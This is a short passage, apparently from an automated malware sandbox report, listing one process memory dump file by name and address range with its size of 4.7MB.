                                                                                                                                                                            • memory/10956-30330-0x0000000000A70000-0x0000000000F26000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              4.7MB